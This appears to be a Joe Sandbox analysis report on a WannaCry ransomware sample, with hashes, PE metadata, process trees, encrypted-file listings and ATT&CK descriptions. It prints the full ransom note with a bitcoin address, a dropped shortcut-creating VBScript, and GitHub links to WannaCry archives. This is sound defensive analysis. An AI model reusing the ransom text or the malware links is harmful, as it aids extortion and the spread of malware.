http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482512
Start date and time:	2024-07-26 00:00:53 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002A_126.EXE.exe
Detection:	MAL
Classification:	mal100.rans.evad.winEXE@790/973@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 3 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtSetValueKey calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
VT rate limit hit for: LisectAVT_2403002A_126.EXE.exe

Simulations

Behavior and APIs

Time	Type	Description
18:01:45	API Interceptor	5290018x Sleep call for process: LisectAVT_2403002A_126.EXE.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\@WanaDecryptor@.exe	LisectAVT_2403002A_223.exe	Get hash	malicious	Wannacry	Browse
	https://github.com/limiteci/WannaCry	Get hash	malicious	Wannacry	Browse
	https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip	Get hash	malicious	Conti, Wannacry	Browse
	Request for Quotation (RFQ_196).zip.zip	Get hash	malicious	Wannacry, Conti	Browse
	https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/raw/master/Ransomware.WannaCry.zip	Get hash	malicious	Wannacry, Conti	Browse
	jTwrz6fY44.exe	Get hash	malicious	Wannacry, Cryptolocker	Browse
	ZN5KdHxjL1.exe	Get hash	malicious	Wannacry	Browse
	wannacry.exe	Get hash	malicious	Wannacry, Conti	Browse
	wannacry.exe	Get hash	malicious	Wannacry	Browse
	Wannacry.exe	Get hash	malicious	Wannacry, Conti	Browse
C:\Users\user\AppData\Local\@WanaDecryptor@.exe	LisectAVT_2403002A_223.exe	Get hash	malicious	Wannacry	Browse
	https://github.com/limiteci/WannaCry	Get hash	malicious	Wannacry	Browse
	https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip	Get hash	malicious	Conti, Wannacry	Browse
	Request for Quotation (RFQ_196).zip.zip	Get hash	malicious	Wannacry, Conti	Browse
	https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/raw/master/Ransomware.WannaCry.zip	Get hash	malicious	Wannacry, Conti	Browse
	jTwrz6fY44.exe	Get hash	malicious	Wannacry, Cryptolocker	Browse
	ZN5KdHxjL1.exe	Get hash	malicious	Wannacry	Browse
	wannacry.exe	Get hash	malicious	Wannacry, Conti	Browse
	wannacry.exe	Get hash	malicious	Wannacry	Browse
	Wannacry.exe	Get hash	malicious	Wannacry, Conti	Browse

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.710902136409594
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnS4RQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3ChvWmMo+S
MD5:	7E6B6DA7C61FCB66F3F30166871DEF5B
SHA1:	00F699CF9BBC0308F6E101283ECA15A7C566D4F9
SHA-256:	4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
SHA-512:	E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
Malicious:	false
Yara Hits:	Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

Process:	C:\Windows\SysWOW64\cscript.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 25 21:01:45 2024, mtime=Thu Jul 25 21:01:45 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	575
Entropy (8bit):	5.140446565826782
Encrypted:	false
SSDEEP:	6:4xtQl3y03CpzeVs+bTNAUHUtxXCzaMmM7/gtrUod6tMljAlpdmqLEoJ4D6Vod6Nd:8iypzYNbd0thHZOgZUobjArozhmV
MD5:	CCD2610ADD4080C4DCC35A11217DA6A6
SHA1:	001ABA92D58B546C8BD54E0BC4103661F68CF92A
SHA-256:	0E272CF58CC66E7B0CC4F42094232A46B6EC11AE5ED695BA4156A1A28DA41E6D
SHA-512:	36DC5CE3027E8A77639783E31AC69C9FA61C4761FBEB9A819C1EB49F4A32BF2001C0441FB28D35C4EC9DD1B713576E7894DE8FD13BF14CE62A436F9619093DEC
Malicious:	false
Preview:	L..................F.... ....b{=.....b{=.....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........DDj....%.=....(..=......t.2......J.2 .@WANAD~1.EXE..X.......X7..X7...............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W.............,p.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......216041...........hT..CrF.f4... .u.E._c...,...E...hT..CrF.f4... .u.E._c...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.972539864099582
Encrypted:	false
SSDEEP:	3:gponhvDCKFcsDqLElynJ96JS2x9rbPqLElynJSK2Fvn:e+hvbqLEoJgJSoPqLEoJSK2Fv
MD5:	876907408D9FC41B5AFDD67A1B8FEE14
SHA1:	910D6A11B2A0F0A1166D7289ADD5DE4FF27A89F3
SHA-256:	F3C6117602E3F85F6D46110C2DB5A8719AECD7EF5ECE10F1A1F5931C1B27BAC8
SHA-512:	E50446C9765D1C2FDB4CC8452F08C82B1245FDCBA99C1A17C28C947108121F5D92E6DFB70002FD81E7CE7A79DBF2B25594FE312A9677E5C76FE6A4A8FB627DAC
Malicious:	true
Preview:	SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.995467986215682
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002A_126.EXE.exe
File size:	3'514'376 bytes
MD5:	c98e7230adb1ba8d2f2082ca885068bb
SHA1:	523a6fdf84bc1b0eec54d9532b3dbe564f29af38
SHA256:	6cf41e72620cafb1577415d626dbb66c8c796d7167164ca091a27c4273378a20
SHA512:	fd20a85e28ca7e4db3015299ce2b047c7868978ca98e170f3251b831b70214f6b4466b2e324edd9e5df33672d918be68929c975838dde8e877c94ea60d57c641
SSDEEP:	98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3:QqPe1Cxcxk3ZAEUadzR8yc4g
TLSH:	F4F533F4E221B7ACF2550EF64855C59B6A9724B2EBEF1E26DA8001A70D44F7F8FC0491
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..

Entrypoint:	0x4077ba
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	68f013d7437aa653a8a98a05807afeb1

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd5a8	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x349fa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x1d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x69b0	0x7000	920e964050a1a5dd60dd00083fd541a2	False	0.5747419084821429	data	6.404235106100747	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x5f70	0x6000	2c42611802d585e6eed68595876d1a15	False	0.5781656901041666	data	6.66357096840794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0x1958	0x2000	83506e37bd8b50cacabd480f8eb3849b	False	0.394287109375	Matlab v4 mat-file (little endian) ry, numeric, rows 0, columns 0	4.4557495078691405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x10000	0x349fa0	0x34a000	f99ce7dc94308f0a149a19e022e4c316	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
XIA	0x100f0	0x349635	Zip archive data, at least v2.0 to extract, compression method=deflate	English	United States	1.0002689361572266
RT_VERSION	0x359728	0x388	data	English	United States	0.46349557522123896
RT_MANIFEST	0x359ab0	0x4ef	exported SGML document, ASCII text, with CRLF line terminators	English	United States	0.42913697545526525

DLL	Import
KERNEL32.dll	GetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
USER32.dll	wsprintfA
ADVAPI32.dll	CreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
MSVCRT.dll	realloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp

Target ID:	0
Start time:	18:01:42
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe"
Imagebase:	0x400000
File size:	3'514'376 bytes
MD5 hash:	C98E7230ADB1BA8D2F2082CA885068BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.1324912594.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1788065356.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	18:01:43
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib +h .
Imagebase:	0xfa0000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	12
Start time:	18:01:46
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	16
Start time:	18:01:47
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	18
Start time:	18:01:48
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	18:01:49
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	24
Start time:	18:01:50
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	25
Start time:	18:01:51
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	29
Start time:	18:01:52
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	32
Start time:	18:01:53
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	18:01:54
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002A_126.EXE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\@Please_Read_Me@.txt

C:\@WanaDecryptor@.exe

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\AppV\Setup\OfficeIntegrator.ps1.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\EventStore.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Network\Downloader\qmgr.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\guest.bmp.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\guest.png.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user-192.png.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user.bmp.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user.png.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\cversions.2.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRY (copy)

Windows Analysis Report
LisectAVT_2403002A_126.EXE.exe

Target ID:	35
Start time:	18:01:55
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	37
Start time:	18:01:56
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	38
Start time:	18:01:57
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	40
Start time:	18:01:58
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	43
Start time:	18:01:59
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Execution Coverage:	24.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.2%
Total number of Nodes:	94
Total number of Limit Nodes:	1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre